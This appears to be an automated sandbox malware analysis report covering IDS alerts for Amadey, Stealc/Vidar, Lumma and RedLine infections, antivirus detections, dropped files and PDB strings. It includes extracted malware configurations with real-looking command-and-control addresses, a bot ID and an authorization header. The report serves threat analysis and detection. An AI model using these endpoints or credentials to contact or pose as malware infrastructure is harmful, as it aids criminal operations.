2024-12-12T16:50:17.071221+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50195	185.81.68.147	80	TCP
2024-12-12T16:50:19.044987+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50196	185.81.68.147	80	TCP
2024-12-12T16:50:20.988187+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50202	185.81.68.147	80	TCP
2024-12-12T16:50:22.890926+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50207	185.81.68.147	80	TCP
2024-12-12T16:50:24.882642+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50221	185.81.68.147	80	TCP
2024-12-12T16:50:26.627266+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50233	185.81.68.147	80	TCP
2024-12-12T16:50:28.320557+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50243	185.81.68.147	80	TCP
2024-12-12T16:50:30.297076+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50254	185.81.68.147	80	TCP
2024-12-12T16:50:32.183845+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50258	185.81.68.147	80	TCP
2024-12-12T16:50:34.064096+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50261	185.81.68.147	80	TCP
2024-12-12T16:50:35.876600+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50265	185.81.68.147	80	TCP
2024-12-12T16:50:37.750819+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50268	185.81.68.147	80	TCP
2024-12-12T16:50:39.704101+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50272	185.81.68.147	80	TCP
2024-12-12T16:50:41.581306+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50275	185.81.68.147	80	TCP
2024-12-12T16:50:43.584964+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50288	185.81.68.147	80	TCP
2024-12-12T16:50:45.346981+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50294	185.81.68.147	80	TCP
2024-12-12T16:50:47.034246+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50296	185.81.68.147	80	TCP
2024-12-12T16:50:48.854420+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50300	185.81.68.147	80	TCP
2024-12-12T16:50:50.537748+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50302	185.81.68.147	80	TCP
2024-12-12T16:50:52.370878+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50311	185.81.68.147	80	TCP
2024-12-12T16:50:54.079049+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50316	185.81.68.147	80	TCP
2024-12-12T16:50:55.996365+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50319	185.81.68.147	80	TCP
2024-12-12T16:50:57.999225+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50329	185.81.68.147	80	TCP
2024-12-12T16:50:59.837977+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50330	185.81.68.147	80	TCP
2024-12-12T16:51:01.617885+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50332	185.81.68.147	80	TCP
2024-12-12T16:51:07.739107+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50337	185.81.68.147	80	TCP
2024-12-12T16:51:09.658808+0100	2017930	1	A Network Trojan was detected	192.168.2.10	50339	185.81.68.147	80	TCP

ET MALWARE UPX compressed file download possible malware

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:56.281784+0100	2001046	3	Misc activity	185.81.68.147	80	192.168.2.10	49983	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:16.237759+0100	2044696	1	A Network Trojan was detected	192.168.2.10	49868	185.215.113.43	80	TCP
2024-12-12T16:48:22.811575+0100	2044696	1	A Network Trojan was detected	192.168.2.10	49884	185.215.113.43	80	TCP
2024-12-12T16:48:29.278884+0100	2044696	1	A Network Trojan was detected	192.168.2.10	49904	185.215.113.43	80	TCP
2024-12-12T16:48:35.207517+0100	2044696	1	A Network Trojan was detected	192.168.2.10	49926	185.215.113.43	80	TCP
2024-12-12T16:48:44.289301+0100	2044696	1	A Network Trojan was detected	192.168.2.10	49951	185.215.113.43	80	TCP
2024-12-12T16:48:51.420975+0100	2044696	1	A Network Trojan was detected	192.168.2.10	49970	185.215.113.43	80	TCP
2024-12-12T16:49:00.649649+0100	2044696	1	A Network Trojan was detected	192.168.2.10	49999	185.215.113.43	80	TCP
2024-12-12T16:49:10.575372+0100	2044696	1	A Network Trojan was detected	192.168.2.10	50035	185.215.113.43	80	TCP
2024-12-12T16:49:29.345278+0100	2044696	1	A Network Trojan was detected	192.168.2.10	50063	185.215.113.43	80	TCP
2024-12-12T16:49:39.185191+0100	2044696	1	A Network Trojan was detected	192.168.2.10	50078	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:26.874704+0100	2058159	1	Domain Observed Used for C2 Detected	192.168.2.10	59721	1.1.1.1	53	UDP
2024-12-12T16:50:27.130932+0100	2058159	1	Domain Observed Used for C2 Detected	192.168.2.10	59721	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:08.701832+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.10	50024	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:08.248085+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.10	50024	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:09.021402+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.10	50024	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:10.669752+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.10	50024	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:09.219283+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.10	50024	TCP
2024-12-12T16:49:40.059724+0100	2044247	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.10	50079	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:42.846309+0100	2051831	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.10	50088	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:40.059485+0100	2049087	1	A Network Trojan was detected	192.168.2.10	50079	116.203.10.31	443	TCP

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:57.323492+0100	2046045	1	A Network Trojan was detected	192.168.2.10	49987	185.81.68.147	1912	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:39.014059+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.10	50267	172.67.213.48	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:07.724825+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.10	50024	185.215.113.206	80	TCP
2024-12-12T16:50:24.214168+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.10	50205	185.215.113.206	80	TCP
2024-12-12T16:50:32.280880+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.10	50255	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:06.778525+0100	2856147	1	A Network Trojan was detected	192.168.2.10	49848	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:14.896120+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.10	49856	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:48:11.236305+0100	2803305	3	Unknown Traffic	192.168.2.10	49858	31.41.244.11	80	TCP
2024-12-12T16:48:17.714552+0100	2803305	3	Unknown Traffic	192.168.2.10	49872	31.41.244.11	80	TCP
2024-12-12T16:48:24.265874+0100	2803305	3	Unknown Traffic	192.168.2.10	49890	31.41.244.11	80	TCP
2024-12-12T16:48:30.727587+0100	2803305	3	Unknown Traffic	192.168.2.10	49912	31.41.244.11	80	TCP
2024-12-12T16:48:36.675555+0100	2803305	3	Unknown Traffic	192.168.2.10	49931	31.41.244.11	80	TCP
2024-12-12T16:48:45.752757+0100	2803305	3	Unknown Traffic	192.168.2.10	49957	185.215.113.16	80	TCP
2024-12-12T16:48:53.217233+0100	2803305	3	Unknown Traffic	192.168.2.10	49975	185.215.113.16	80	TCP
2024-12-12T16:49:02.146006+0100	2803305	3	Unknown Traffic	192.168.2.10	50010	185.215.113.16	80	TCP
2024-12-12T16:49:12.109274+0100	2803305	3	Unknown Traffic	192.168.2.10	50037	31.41.244.11	80	TCP
2024-12-12T16:49:14.712528+0100	2803305	3	Unknown Traffic	192.168.2.10	50039	31.41.244.11	80	TCP
2024-12-12T16:49:24.329585+0100	2803305	3	Unknown Traffic	192.168.2.10	50049	31.41.244.11	80	TCP
2024-12-12T16:49:30.848414+0100	2803305	3	Unknown Traffic	192.168.2.10	50065	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:49:12.076552+0100	2803304	3	Unknown Traffic	192.168.2.10	50024	185.215.113.206	80	TCP
2024-12-12T16:49:44.305053+0100	2803304	3	Unknown Traffic	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:46.315458+0100	2803304	3	Unknown Traffic	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:48.646766+0100	2803304	3	Unknown Traffic	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:50.303983+0100	2803304	3	Unknown Traffic	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:55.712604+0100	2803304	3	Unknown Traffic	192.168.2.10	50084	185.215.113.206	80	TCP
2024-12-12T16:49:56.940429+0100	2803304	3	Unknown Traffic	192.168.2.10	50084	185.215.113.206	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:50:50.833525+0100	2843864	1	A Network Trojan was detected	192.168.2.10	50299	172.67.213.48	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	Avira: detection malicious, Label: HEUR/AGEN.1306956

Found malware configuration

Source: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "fvcxcx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\t5abhIx[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[2].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Google\Chrome\Extensions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49920 version: TLS 1.2

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412707099.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413257416.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403438920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407734052.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402997907.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411298731.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412401802.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413433543.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2498270085.00007FF838AC1000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2404034326.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411720921.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2410685858.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412236687.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403127092.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408261086.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402461321.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403281941.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412064565.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\select.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408717409.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413918050.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403748215.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411113036.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408039545.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402824142.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411883189.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\python38.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2482728285.00007FF8209FD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407574010.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412918529.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
